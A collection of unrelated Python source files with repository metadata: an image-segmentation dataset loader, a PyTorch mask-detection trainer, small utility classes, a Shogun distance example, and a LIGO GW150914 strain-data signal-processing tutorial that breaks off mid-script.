2ac03ec918444160ad766c68aebfd92c369595f2
b7fbe103e03573cc7ac2d1c6f2d150377601f632
/dataset.py
c1b8ac03ef93e850adcab4d7e419613b8f3e0456
[]
no_license
fortis3000/blob_detection
294736ab7befe6993fc5852ec35f193be434ead5
5b0d5adf86cfa0b41dd7e53d00dfff8dbb82fd13
refs/heads/master
2023-02-20T17:57:36.252672
2021-01-18T13:56:14
2021-01-18T13:56:14
330,676,190
1
0
null
null
null
null
UTF-8
Python
false
false
3,818
py
""" Bulk dataset module """ import os import cv2 import matplotlib.pyplot as plt import numpy as np class Dataset: """ Bulk dataset Dataset. Reads images, apply augmentation and preprocessing transformations. Args: images_dir (str): path to images folder masks_dir (str): path to segmentation masks folder classes (list): values of classes to extract from segmentation mask augmentation (albumentations.Compose): data transfromation pipeline (e.g. flip, scale, etc.) preprocessing (albumentations.Compose): data preprocessing (e.g. noralization, shape manipulation, etc.) Example: dataset = Dataset(image_folder, masks+folder, classes=['bulk']) """ CLASSES = ["bulk"] def __init__( self, images_dir: str, masks_dir: str, classes=None, augmentations=None, preprocessing=None, ): self.ids = os.listdir(images_dir) self.images_fps = [ os.path.join(images_dir, image_id) for image_id in self.ids ] self.masks_fps = [ os.path.join(masks_dir, mask_id) for mask_id in self.ids ] self.class_values = [self.CLASSES.index(c.lower()) + 1 for c in classes] self.augmentations = augmentations self.preprocessing = preprocessing def __getitem__(self, item): # read data image = cv2.imread(self.images_fps[item]) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) mask = cv2.imread(self.masks_fps[item], 0) assert mask is not None, ( f"Mask can't be readed," f" mask: {self.masks_fps[item]}," f" image: {self.images_fps[item]}" ) mask //= 255 # extract class from mask masks = [(mask == v) for v in self.class_values] mask = np.stack(masks, axis=-1).astype("float") # add background if mask is not binary if mask.shape[-1] != 1: background = 1 - mask.sum(axis=-1, keepdims=True) mask = np.concatenate((mask, background), axis=-1) # apply augmentations if self.augmentations: sample = self.augmentations(image=image, mask=mask) image, mask = sample["image"], sample["mask"] # apply preprocessing if self.preprocessing: sample = self.preprocessing(image=image, mask=mask) image, mask = sample["image"], sample["mask"] return image, mask def __len__(self): return len(self.ids) def visualize(save_name: str = None, **images): """Plots images in one row""" n = len(images) plt.figure(figsize=(16, 5)) for i, (name, image) in enumerate(images.items()): plt.subplot(1, n, i + 1) plt.xticks([]) plt.yticks([]) plt.title(" ".join(name.split("_")).title()) # do not work with colab if image.shape[-1] == 1: plt.imshow(image.squeeze(-1)) else: plt.imshow(image) if save_name: plt.savefig(save_name) plt.close() def denormalize(x): """Scale image to range 0..1 for correct plot""" x_max = np.percentile(x, 98) x_min = np.percentile(x, 2) x = (x - x_min) / (x_max - x_min) x = x.clip(0, 1) return x if __name__ == "__main__": data_path = os.path.join("data", "raw") dataset = Dataset( images_dir=os.path.join(data_path, "val"), masks_dir=os.path.join(data_path, "val_masks"), classes=["bulk"], augmentations=None, preprocessing=None, ) for i in range(20): image, mask, _ = dataset[i] print(image.shape) print(mask.shape) visualize(image=image, bulk_mask=mask) print(_)
4e4423d83f7f75ce347ed72f5eb755161c853971
0938dfe5cd7678bc1fa5060019b944d3d7f319d6
/Trainer.py
26f95e2fad53db1befbc5e535967399c64896476
[]
no_license
joon1230/Mask_Detection
04e4a0fb2999f79c1360435feffafb99bf9789c2
65cf464c6880afd4f88535628831577d1c5fae90
refs/heads/main
2023-06-02T02:31:10.620322
2021-06-18T03:38:35
2021-06-18T03:38:35
null
0
0
null
null
null
null
UTF-8
Python
false
false
7,209
py
import os import pandas as pd import time from functools import partial import glob import numpy as np import torch import torch.optim from torch.utils.data import Dataset, DataLoader from sklearn.metrics import f1_score from sklearn.model_selection import train_test_split import utils import Datasets class Trainer(): def __init__(self, model, model_name, transform, dataset, optimizer, learning_rate, weight_decay, batch_size, train_ratio, loss_function, epoch, input_size, nick_name, load_size=None, scheduler=None): self.model = model() self.dataset = partial(dataset, transform = transform, size = load_size) self.val_dataset = partial(Datasets.MaskDataset, transform=Datasets.transform_test(input_size=input_size)) self.learning_rate = learning_rate self.weight_decay = weight_decay self.train_ratio = train_ratio self.batch_size = batch_size self.train_test_split() self.epoch = epoch self.optimizer = optimizer(self.model.parameters(), lr=self.learning_rate, weight_decay=self.weight_decay) self.scheduler = scheduler(optimizer=self.optimizer) self.criterion = loss_function self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.model.to(self.device) self.log = f"""| model_name : {model_name} | load_size : {load_size} | input_size : {input_size} | batch : {batch_size} |\n| train_people : {len(self.train_paths)} , val_people : {len(self.val_paths)} \n| loss function : {loss_function}\n| optimizer : {optimizer} | weight_decay : {weight_decay} | learning_rate : {learning_rate} \n| transform : {transform} """ self.save_path = f'{model_name}/{optimizer}/{model_name + nick_name}' print(self.log) def train(self): for i in range(1, self.epoch + 1): self.train_one_epoch(i) if 1 - self.train_ratio: self.test_one_epoch(i) self.save_model(i, name='epoch', save_path=self.save_path) if not (1 - self.train_ratio): self.save_model(i, name='epoch', save_path=self.save_path) def train_one_epoch(self, epoch): self.model.train() train_loss = 0 correct = 0 total = 0 load_time = 0 inference_time = 0 f1_score = 0 self.log += f"\n\n====train model epoch : {epoch}====\n" print(f"\n\n====train model epoch : {epoch}====") start_time = time.time() for batch_idx, (inputs, labels) in enumerate(self.train_loader): inputs, labels = inputs.to(self.device), labels.to(self.device) s = time.time() self.optimizer.zero_grad() # 각각의 모델 파라미터 안의 gradient가 update 된다. outputs = self.model(inputs) loss = self.criterion(outputs, labels) loss.backward() self.optimizer.step() if self.scheduler: self.scheduler.step() train_loss += loss.item() _, predicted = outputs.max(1) total += labels.size(0) correct += predicted.eq(labels).sum().item() f1_score += self.f1_score(predicted, labels) inference_time += time.time() - s load_time = time.time() - start_time - inference_time if batch_idx % 10 == 0: self.log += "batch : %.3d | Loss: %.3f | Acc : %.3f%% | f1_score : %.3f%% | inference_time : %.3f / load_time : %.3f \n" \ % ( batch_idx, train_loss / (batch_idx + 1), 100. * correct / total, f1_score / (batch_idx + 1), inference_time / (batch_idx + 1), load_time / (batch_idx + 1e-04)) print( "batch : %.3d | Loss: %.3f | Acc : %.3f%% | f1_score : %.3f%% | inference_time : %.3f / load_time : %.3f \r" \ % (batch_idx, train_loss / (batch_idx + 1), 100. * correct / total, f1_score / (batch_idx + 1), inference_time / (batch_idx + 1), load_time / (batch_idx + 1e-04)), end="") def test_one_epoch(self, epoch): self.model.eval() test_loss = 0 correct = 0 total = 0 f1_score = 0 print() print(f"====Evaluation model epoch : {epoch}====") with torch.no_grad(): for batch_idx, (inputs, labels) in enumerate(self.val_loader): inputs, labels = inputs.to(self.device), labels.to(self.device) outputs = self.model(inputs) loss = self.criterion(outputs, labels) test_loss += loss.item() _, predicted = outputs.max(1) total += labels.size(0) correct += predicted.eq(labels).sum().item() f1_score += self.f1_score(predicted, labels) print(f"progress:{batch_idx * self.batch_size} | {len(self.val_paths)} \r", end="") self.log += f'Accuracy of the network on the {total} test image : %d %% | f1_score : %.3f %%' % ( 100 * correct / total, f1_score / (batch_idx)) print(f'Accuracy of the network on the {total} test image : %d %% | f1_score : %.3f %%' % ( 100 * correct / total, f1_score / (batch_idx))) def save_model(self, epoch, save_path, name='student'): print(f'saved model {save_path}') if not os.path.exists(save_path): os.makedirs(save_path) file_name = f"{name}_{epoch}.pth" file_path = os.path.join(save_path, file_name) torch.save(self.model.state_dict(), file_path) with open(f'{save_path}/log.txt', 'w') as f: f.write(self.log) return None def train_test_split(self): meta_data = pd.read_csv('../input/data/train/train.csv') if 1 - self.train_ratio: meta_data['cls'] = meta_data.path.map(self.get_person_class) train_paths, val_paths = train_test_split(meta_data, train_size=self.train_ratio, stratify=meta_data['cls']) self.train_paths, self.val_paths = train_paths.path.values, val_paths.path.values self.train_loader = DataLoader(self.dataset(dir_paths=self.train_paths), batch_size=self.batch_size, shuffle=True, num_workers=4) self.val_loader = DataLoader(self.val_dataset(dir_paths=self.val_paths), batch_size=self.batch_size, shuffle=True, num_workers=4) else: self.train_paths, self.val_paths = list(meta_data.path.values), [] self.train_loader = DataLoader(self.dataset(dir_paths=self.train_paths), batch_size=self.batch_size, shuffle=True, num_workers=4) def f1_score(self, y_pred, target): y_pred, target = np.asarray(y_pred.to('cpu')), np.asarray(target.to('cpu')) return f1_score(y_pred, target, average='macro') def get_person_class(self, data): gender = utils.get_gender_logit(data) age_cls = utils.get_age_class(data.split('_')[-1]) return gender*3 + age_cls
8d49dfba348dc525114f8c35b0b4eaa0c06bf9fd
0427eeafe5dfa0d25a88c535e16f2c5c566f7ebf
/Expression/separator.py
c656696079f48ab02d77130c74e3c754784d4bde
[]
no_license
balujaashish/NOW_PDF_Reader
86d653536317d064ebbe40e9a3b5c9233fd95b9a
f6cba94f034352e2c7287e98bdbb89a9baa7cfe6
refs/heads/master
2021-03-31T15:17:37.169832
2020-06-16T05:53:12
2020-06-16T05:53:12
248,115,613
0
0
null
null
null
null
UTF-8
Python
false
false
83
py
class Separator(): def __init__(self): self.separators = ['=', ':']
f1babe1d7b57929d0c33a6a71de633682880da6e
2d2b25484e96753891554df3d1f3ea86e5df2bd2
/hits/__init__.py
5479b058039073cbf7d4528c1fda0c74a8fad336
[]
no_license
maxzuo/HITSystem
83d8539c9dd5916a7952c9d5f647ace8b12382b2
943ba5c1d17df79b1f6f346cfdefcaab8d5bc2ec
refs/heads/master
2020-04-23T22:59:41.921050
2019-04-19T21:38:09
2019-04-19T21:38:09
171,520,452
0
0
null
null
null
null
UTF-8
Python
false
false
2,538
py
import sys import os from datetime import datetime import convert __version__ = "0.1.0" # class __Converter: # def __init__(self): # # self. # return # #Converts HIT src to tsv using key and saving it to dest # def raw2tsv(self, src, key, dest, verbose=False): # now = datetime.now() # if (not os.path.isfile(src)): # raise Exception("The provided source filepath is not a file: %s" % src) # if (not os.path.isfile(key)): # raise Exception("The provided key filepath is not a file: %s" % src) # #Retrieve and process raw data. Hardcoding to ignore the first 5 lines # #and the 7th line (not important) # raw = process(readLines(src)) # #Printing metadata deleted when processing the file # os.system("clear") # print "Raw File:\t\t\t\t%s\n\nMetadata:\n" %src, reduce(lambda x,y: "\n".join([x,y]), # map(lambda x: "\r\t\t\t\t\t".join(x), raw[:5])) # matrix = raw[5:] # matrix.pop(1) # #calculating columns and rows so the resulting matrix will be rectangular # cols = max([len(line) for line in matrix]) # rows = len(matrix) # #recreating tsv as a matrix. Not completely necessary # for line in matrix: # while len(line) < cols: # line.append("") # #Retrieve keys and store in a dictionary # # print matrix[0] # keys = self.__process(readLines(key)) # keyDict = {} # for key in keys: # keyDict[key[1]] = key[0] # #Array tagged used to remember indices of desired elements # tagged = [] # for i in xrange(cols): # try: # matrix[0][i] = keyDict[matrix[0][i]] # tagged.append(i) # except: # pass # #Write new file at destinated file path # with open(dest, "w") as destFile: # for i in xrange(rows): # line = [] # for j in xrange(cols): # if j == 0 or j in tagged: # line.append(matrix[i][j]) # destFile.write("\t".join(line) + "\n") # print "\n\nProcessed file saved at:\t\t%s\n" % dest # if verbose: # print "Conversion took\t\t\t\t%s\n" % str(datetime.now() - now) # #Wrapper function to open, read, and then close a file # #Returns an array of lines # def __readLines(self, src): # src = open(src, "r") # lines = src.readlines() # src.close() # return lines # #Wrapper function to process and clean tsv files # #Returns tsv back # def __process(self, tsv): # tsv = [line.replace("\r\n", "").replace("\n", "") for line in tsv] # tsv = map(lambda line: line.split("\t"), tsv) # for line in tsv: # try: # line.remove("") # except: # pass # return tsv
f9520500f015b1f2f85946de085b6dfb1d169031
b92b0e9ba2338ab311312dcbbeefcbb7c912fc2e
/build/shogun_lib/examples/documented/python_modular/distance_sparseeuclidean_modular.py
2e8e098e832784cb39eb330eae2d7c48c0f9148f
[]
no_license
behollis/muViewBranch
384f8f97f67723b2a4019294854969d6fc1f53e8
1d80914f57e47b3ad565c4696861f7b3213675e0
refs/heads/master
2021-01-10T13:22:28.580069
2015-10-27T21:43:20
2015-10-27T21:43:20
45,059,082
1
0
null
null
null
null
UTF-8
Python
false
false
1,057
py
# In this example a sparse euclidean distance is computed for sparse toy data. from tools.load import LoadMatrix lm=LoadMatrix() traindat = lm.load_numbers('../data/fm_train_real.dat') testdat = lm.load_numbers('../data/fm_test_real.dat') parameter_list = [[traindat,testdat],[traindat,testdat]] def distance_sparseeuclidean_modular (fm_train_real=traindat,fm_test_real=testdat): from shogun.Features import RealFeatures, SparseRealFeatures from shogun.Distance import SparseEuclidianDistance realfeat=RealFeatures(fm_train_real) feats_train=SparseRealFeatures() feats_train.obtain_from_simple(realfeat) realfeat=RealFeatures(fm_test_real) feats_test=SparseRealFeatures() feats_test.obtain_from_simple(realfeat) distance=SparseEuclidianDistance(feats_train, feats_train) dm_train=distance.get_distance_matrix() distance.init(feats_train, feats_test) dm_test=distance.get_distance_matrix() return distance,dm_train,dm_test if __name__=='__main__': print('SparseEuclidianDistance') distance_sparseeuclidean_modular(*parameter_list[0])
[ "prosen@305cdda6-5ce1-45b3-a98d-dfc68c8b3305" ]
prosen@305cdda6-5ce1-45b3-a98d-dfc68c8b3305
338f2eb6af266e51dbd32008647d14094b811fc4
c0d312304522defd70997617f8b9288d974001b5
/projects/ligo/GW150914_tutorial.py
79e1120d82dccdefda0a059369e7098009c43b23
[]
no_license
adamw523/ai-north-docker-jupyter
312c7e9d2380149a8f2b78aaa63675fe7a4f7fb7
9b9ea0b76b83854ba73310c04d578d9bf2ae5dea
refs/heads/master
2020-04-06T06:53:39.657886
2016-09-15T17:58:03
2016-09-15T17:58:03
64,694,508
1
0
null
null
null
null
UTF-8
Python
false
false
36,218
py
# coding: utf-8 # # SIGNAL PROCESSING WITH GW150914 OPEN DATA # # Welcome! This ipython notebook (or associated python script GW150914_tutorial.py ) will go through some typical signal processing tasks on strain time-series data associated with the LIGO GW150914 data release from the LIGO Open Science Center (LOSC): # # * https://losc.ligo.org/events/GW150914/ # # * View the tutorial as a web page - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.html/ # * Download the tutorial as a python script - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.py/ # * Download the tutorial as iPython Notebook - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.ipynb/ # # To begin, download the ipython notebook, readligo.py, and the data files listed below, into a directory / folder, then run it. Or you can run the python script GW150914_tutorial.py. You will need the python packages: numpy, scipy, matplotlib, h5py. # # On Windows, or if you prefer, you can use a python development environment such as Anaconda (https://www.continuum.io/why-anaconda) or Enthought Canopy (https://www.enthought.com/products/canopy/). # # Questions, comments, suggestions, corrections, etc: email [email protected] # # v20160208b # ## Intro to signal processing # # This tutorial assumes that you know python well enough. # # If you know how to use "ipython notebook", use the GW150914_tutorial.ipynb file. Else, you can use the GW150914_tutorial.py script. # # This tutorial assumes that you know a bit about signal processing of digital time series data (or want to learn!). This includes power spectral densities, spectrograms, digital filtering, whitening, audio manipulation. This is a vast and complex set of topics, but we will cover many of the basics in this tutorial. # # If you are a beginner, here are some resources from the web: # * http://101science.com/dsp.htm # * https://georgemdallas.wordpress.com/2014/05/14/wavelets-4-dummies-signal-processing-fourier-transforms-and-heisenberg/ # * https://en.wikipedia.org/wiki/Signal_processing # * https://en.wikipedia.org/wiki/Spectral_density # * https://en.wikipedia.org/wiki/Spectrogram # * http://greenteapress.com/thinkdsp/ # * https://en.wikipedia.org/wiki/Digital_filter # # And, well, lots more - google it! # ## Download the data # # * Download the data files from LOSC: # * We will use the hdf5 files, both H1 and L1, with durations of 32 and 4096 seconds around GW150914, sampled at 16384 and 4096 Hz : # * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126259446-32.hdf5 # * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_4_V1-1126259446-32.hdf5 # * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126259446-32.hdf5 # * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_16_V1-1126259446-32.hdf5 # * https://losc.ligo.org/s/events/GW150914/GW150914_4_NR_waveform.txt # * Download the python functions to read the data: https://losc.ligo.org/s/sample_code/readligo.py # * From a unix/mac-osx command line, you can use wget; for example, # * wget https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126257414-4096.hdf5 # * Put these files in your current directory / folder. Don't mix any other LOSC data files in this directory, or readligo.py may get confused. # # Here, # * "H-H1" means that the data come from the LIGO Hanford Observatory site and the LIGO "H1" datector; # * the "_4_" means the strain time-series data are (down-)sampled from 16384 Hz to 4096 Hz; # * the "V1" means version 1 of this data release; # * "1126257414-4096" means the data starts at GPS time 1126257414 (Mon Sep 14 09:16:37 GMT 2015), duration 4096 seconds; # * NOTE: GPS time is number of seconds since Jan 6, 1980 GMT. See http://www.oc.nps.edu/oc2902w/gps/timsys.html or https://losc.ligo.org/gps/ # * the filetype "hdf5" means the data are in hdf5 format: # https://www.hdfgroup.org/HDF5/ # # Note that the the 4096 second long files at 16384 Hz sampling rate are fairly big files (125 MB). # You won't need them for this tutorial: # * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126257414-4096.hdf5 # * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_4_V1-1126257414-4096.hdf5 # * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126257414-4096.hdf5 # * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_16_V1-1126257414-4096.hdf5 # # In[2]: # Standard python numerical analysis imports: import numpy as np from scipy import signal from scipy.interpolate import interp1d from scipy.signal import butter, filtfilt, iirdesign, zpk2tf, freqz # the ipython magic below must be commented out in the .py file, since it doesn't work. #get_ipython().magic(u'matplotlib inline') #get_ipython().magic(u"config InlineBackend.figure_format = 'retina'") import matplotlib.pyplot as plt import matplotlib.mlab as mlab import h5py # LIGO-specific readligo.py import readligo as rl # **NOTE** that in general, LIGO strain time series data has gaps (filled with NaNs) when the detectors are not taking valid ("science quality") data. Analyzing these data requires the user to loop over "segments" of valid data stretches. In https://losc.ligo.org/segments/ we provide example code to do this. # # **However**, the 4096 seconds of released data around GW150914 is one unbroken segment, with no gaps. So for now, we will read it all in and treat it as one valid data segment, ignoring the extra complexity mentioned above. # # **This won't work** for other LOSC data releases! See https://losc.ligo.org/segments/ for a more general way to find valid data segments in LOSC data. # In[3]: #---------------------------------------------------------------- # Load LIGO data from a single file #---------------------------------------------------------------- # First from H1 fn_H1 = 'H-H1_LOSC_4_V1-1126259446-32.hdf5' strain_H1, time_H1, chan_dict_H1 = rl.loaddata(fn_H1, 'H1') # and then from L1 fn_L1 = 'L-L1_LOSC_4_V1-1126259446-32.hdf5' strain_L1, time_L1, chan_dict_L1 = rl.loaddata(fn_L1, 'L1') # sampling rate: fs = 4096 # both H1 and L1 will have the same time vector, so: time = time_H1 # the time sample interval (uniformly sampled!) dt = time[1] - time[0] # ## Adding a numerical relativity template # # Now let's also read in a theoretical (numerical relativity) template, # generated with parameters favored by the output from the GW150914 parameter estimation (see the GW150914 detection paper, https://dcc.ligo.org/P150914/public ). # # This NR template corresponds to the signal expected from a pair of black holes with masses of around 36 and 29 solar masses, merging into a single black hole of 62 solar masses, at a distance of around 410 Mpc. # # You can fetch the template time series from the following URL, and put it in your working directory / folder: # * https://losc.ligo.org/s/events/GW150914/GW150914_4_NR_waveform.txt # # In[4]: # read in the NR template NRtime, NR_H1 = np.genfromtxt('GW150914_4_NR_waveform.txt').transpose() # ## First look at the data from H1 and L1 # In[5]: # First, let's look at the data and print out some stuff: # this doesn't seem to work for scientific notation: # np.set_printoptions(precision=4) print ' time_H1: len, min, mean, max = ', len(time_H1), time_H1.min(), time_H1.mean(), time_H1.max() print 'strain_H1: len, min, mean, max = ', len(strain_H1), strain_H1.min(),strain_H1.mean(),strain_H1.max() print 'strain_L1: len, min, mean, max = ', len(strain_L1), strain_L1.min(),strain_L1.mean(),strain_L1.max() #What's in chan_dict? See https://losc.ligo.org/archive/dataset/GW150914/ bits = chan_dict_H1['DATA'] print 'H1 DATA: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max() bits = chan_dict_H1['CBC_CAT1'] print 'H1 CBC_CAT1: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max() bits = chan_dict_H1['CBC_CAT2'] print 'H1 CBC_CAT2: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max() bits = chan_dict_L1['DATA'] print 'L1 DATA: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max() bits = chan_dict_L1['CBC_CAT1'] print 'L1 CBC_CAT1: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max() bits = chan_dict_L1['CBC_CAT2'] print 'L1 CBC_CAT2: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max() print 'In both H1 and L1, all 32 seconds of data are present (DATA=1), ' print "and all pass data quality (CBC_CAT1=1 and CBC_CAT2=1)." # In[6]: # plot +- 5 seconds around the event: tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015 deltat = 5. # seconds around the event # index into the strain time series for this time interval: indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat)) plt.figure() plt.plot(time_H1[indxt]-tevent,strain_H1[indxt],'r',label='H1 strain') plt.plot(time_L1[indxt]-tevent,strain_L1[indxt],'g',label='L1 strain') plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('strain') plt.legend(loc='lower right') plt.title('Advanced LIGO strain data near GW150914') plt.savefig('GW150914_strain.png') # The data are dominated by **low frequency noise**; there is no way to see a signal here, without some signal processing. # # There are very low frequency oscillations that are putting the mean of the L1 strain at -2.0e-18 at the time around this event, so it appears offset from the H1 strain. These low frequency oscillations are essentially ignored in LIGO data analysis (see bandpassing, below). # # We will be "whitening" the data, below. # ## Data in the Fourier domain - ASDs # # Plotting these data in the Fourier domain gives us an idea of the frequency content of the data. A way to visualize the frequency content of the data is to plot the amplitude spectral density, ASD. # # The ASDs are the square root of the power spectral densities (PSDs), which are averages of the square of the fast fourier transforms (FFTs) of the data. # # They are an estimate of the "strain-equivalent noise" of the detectors versus frequency, # which limit the ability of the detectors to identify GW signals. # # They are in units of strain/rt(Hz). # So, if you want to know the root-mean-square (rms) strain noise in a frequency band, # integrate (sum) the squares of the ASD over that band, then take the square-root. # # There's a signal in these data! # For the moment, let's ignore that, and assume it's all noise. # In[7]: # number of sample for the fast fourier transform: NFFT = 1*fs fmin = 10 fmax = 2000 Pxx_H1, freqs = mlab.psd(strain_H1, Fs = fs, NFFT = NFFT) Pxx_L1, freqs = mlab.psd(strain_L1, Fs = fs, NFFT = NFFT) # We will use interpolations of the ASDs computed above for whitening: psd_H1 = interp1d(freqs, Pxx_H1) psd_L1 = interp1d(freqs, Pxx_L1) # plot the ASDs: plt.figure() plt.loglog(freqs, np.sqrt(Pxx_H1),'r',label='H1 strain') plt.loglog(freqs, np.sqrt(Pxx_L1),'g',label='L1 strain') plt.axis([fmin, fmax, 1e-24, 1e-19]) plt.grid('on') plt.ylabel('ASD (strain/rtHz)') plt.xlabel('Freq (Hz)') plt.legend(loc='upper center') plt.title('Advanced LIGO strain data near GW150914') plt.savefig('GW150914_ASDs.png') # NOTE that we only plot the data between fmin = 10 Hz and fmax = 2000 Hz. # # Below fmin, the data **are not properly calibrated**. That's OK, because the noise is so high below fmin that LIGO cannot sense gravitational wave strain from astrophysical sources in that band. # # The sample rate is fs = 4096 Hz (2^12 Hz), so the data cannot capture frequency content above the Nyquist frequency = fs/2 = 2048 Hz. That's OK, because GW150914 only has detectable frequency content in the range 20 Hz - 300 Hz. # # You can see strong spectral lines in the data; they are all of instrumental origin. Some are engineered into the detectors (mirror suspension resonances at ~500 Hz and harmonics, calibration lines, control dither lines, etc) and some (60 Hz and harmonics) are unwanted. We'll return to these, later. # # You can't see the signal in this plot, since it is relatively weak and less than a second long, while this plot averages over 32 seconds of data. So this plot is entirely dominated by instrumental noise. # # Later on in this tutorial, we'll look at the data sampled at the full 16384 Hz (2^14 Hz). # ## Whitening # # From the ASD above, we can see that the data are very strongly "colored" - noise fluctuations are much larger at low and high frequencies and near spectral lines, reaching a roughly flat ("white") minimum in the band around 80 to 300 Hz. # # We can "whiten" the data (dividing it by the noise amplitude spectrum, in the fourier domain), suppressing the extra noise at low frequencies and at the spectral lines, to better see the weak signals in the most sensitive band. # # Whitening is always one of the first steps in astrophysical data analysis (searches, parameter estimation). # Whitening requires no prior knowledge of spectral lines, etc; only the data are needed. # # The resulting time series is no longer in units of strain; now in units of "sigmas" away from the mean. # In[8]: # function to writen data def whiten(strain, interp_psd, dt): Nt = len(strain) freqs = np.fft.rfftfreq(Nt, dt) # whitening: transform to freq domain, divide by asd, then transform back, # taking care to get normalization right. hf = np.fft.rfft(strain) white_hf = hf / (np.sqrt(interp_psd(freqs) /dt/2.)) white_ht = np.fft.irfft(white_hf, n=Nt) return white_ht # now whiten the data from H1 and L1, and also the NR template: strain_H1_whiten = whiten(strain_H1,psd_H1,dt) strain_L1_whiten = whiten(strain_L1,psd_L1,dt) NR_H1_whiten = whiten(NR_H1,psd_H1,dt) # Now plot the whitened strain data, along with the best-fit numerical relativity (NR) template. # # To get rid of remaining high frequency noise, we will also bandpass the data (see bandpassing, below). # In[9]: # We need to suppress the high frequencies with some bandpassing: bb, ab = butter(4, [20.*2./fs, 300.*2./fs], btype='band') strain_H1_whitenbp = filtfilt(bb, ab, strain_H1_whiten) strain_L1_whitenbp = filtfilt(bb, ab, strain_L1_whiten) NR_H1_whitenbp = filtfilt(bb, ab, NR_H1_whiten) # plot the data after whitening: # first, shift L1 by 7 ms, and invert. See the GW150914 detection paper for why! strain_L1_shift = -np.roll(strain_L1_whitenbp,int(0.007*fs)) plt.figure() plt.plot(time-tevent,strain_H1_whitenbp,'r',label='H1 strain') plt.plot(time-tevent,strain_L1_shift,'g',label='L1 strain') plt.plot(NRtime+0.002,NR_H1_whitenbp,'k',label='matched NR waveform') plt.xlim([-0.1,0.05]) plt.ylim([-4,4]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('whitented strain') plt.legend(loc='lower left') plt.title('Advanced LIGO WHITENED strain data near GW150914') plt.savefig('GW150914_strain_whitened.png') # The signal is now clearly visible in the whitened and bandpassed data. The "DC" offset between H1 and L1 data visible in the first plot is no longer visible here; the bandpassing cuts off frequency components below around 20 Hz and above 300 Hz. # # The signal is visible as an oscillation sweeping from low to high frequency from -0.10 seconds to 0, then damping down into the random noise. # # The signal looks roughly the same in both detectors. We had to shift the L1 data by 7 ms to get it to line up with the data from H1, because the source is roughly in the direction of the line connecting H1 to L1, and the wave travels at the speed of light, so it hits L1 7 ms earlier. Also, the orientation of L1 with respect to H1 means that we have to flip the sign of the signal in L1 for it to match the signal in H1. # # It's exactly the kind of signal we expect from the inspiral, merger and ringdown of two massive black holes, as evidenced by the good match with the numerical relativity (NR) waveform, in black. # # LIGO uses a rather elaborate software suite to match the data against a family of such signal waveforms ("templates"), to find the best match. This procedure helps LIGO to "optimally" separate signals from instrumental noise, and to infer the parameters of the source (masses, spins, sky location, orbit orientation, etc) from the best match templates. # ## Spectrograms # # Now let's plot a short time-frequency spectrogram around GW150914: # In[10]: tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015 deltat = 10. # seconds around the event # index into the strain time series for this time interval: indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat)) # pick a shorter FTT time interval, like 1/8 of a second: NFFT = fs/8 # and with a lot of overlap, to resolve short-time features: NOVL = NFFT*15/16 # and choose a window that minimizes "spectral leakage" # (https://en.wikipedia.org/wiki/Spectral_leakage) window = np.blackman(NFFT) # the right colormap is all-important! See: # http://matplotlib.org/examples/color/colormaps_reference.html # viridis seems to be the best for our purposes, but it's new; if you don't have it, you can settle for ocean. spec_cmap='viridis' #spec_cmap='ocean' # Plot the H1 spectrogram: plt.figure() spec_H1, freqs, bins, im = plt.specgram(strain_H1[indxt], NFFT=NFFT, Fs=fs, window=window, noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('Frequency (Hz)') plt.colorbar() plt.axis([-deltat, deltat, 0, 2000]) plt.title('aLIGO H1 strain data near GW150914') plt.savefig('GW150914_H1_spectrogram.png') # Plot the L1 spectrogram: plt.figure() spec_H1, freqs, bins, im = plt.specgram(strain_L1[indxt], NFFT=NFFT, Fs=fs, window=window, noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat]) plt.xlabel('time (s) since '+str(tevent)) plt.ylabel('Frequency (Hz)') plt.colorbar() plt.axis([-deltat, deltat, 0, 2000]) plt.title('aLIGO L1 strain data near GW150914') plt.savefig('GW150914_L1_spectrogram.png') # In the above spectrograms, you can see lots of excess power below ~20 Hz, as well as strong spectral lines at 500, 1000, 1500 Hz (also evident in the ASDs above). The lines at multiples of 500 Hz are the harmonics of the "violin modes" of the fibers holding up the mirrors of the LIGO interferometers. # # The signal is just bately visible here, at time=0 and below 500 Hz. We need to zoom in around the event time, and to the frequency range from [20, 400] Hz, and use the whitened data generated above. # In[11]: # plot the whitened data, zooming in on the signal region: tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015 deltat = 10. # seconds around the event # index into the strain time series for this time interval: indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat)) # pick a shorter FTT time interval, like 1/16 of a second: NFFT = fs/16 # and with a lot of overlap, to resolve short-time features: NOVL = NFFT*15/16 # and choose a window that minimizes "spectral leakage" # (https://en.wikipedia.org/wiki/Spectral_leakage) window = np.blackman(NFFT) # Plot the H1 whitened spectrogram around the signal plt.figure() spec_H1, freqs, bins, im = plt.specgram(strain_H1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window, noverlap=NOVL, cmap=spec_cmap, 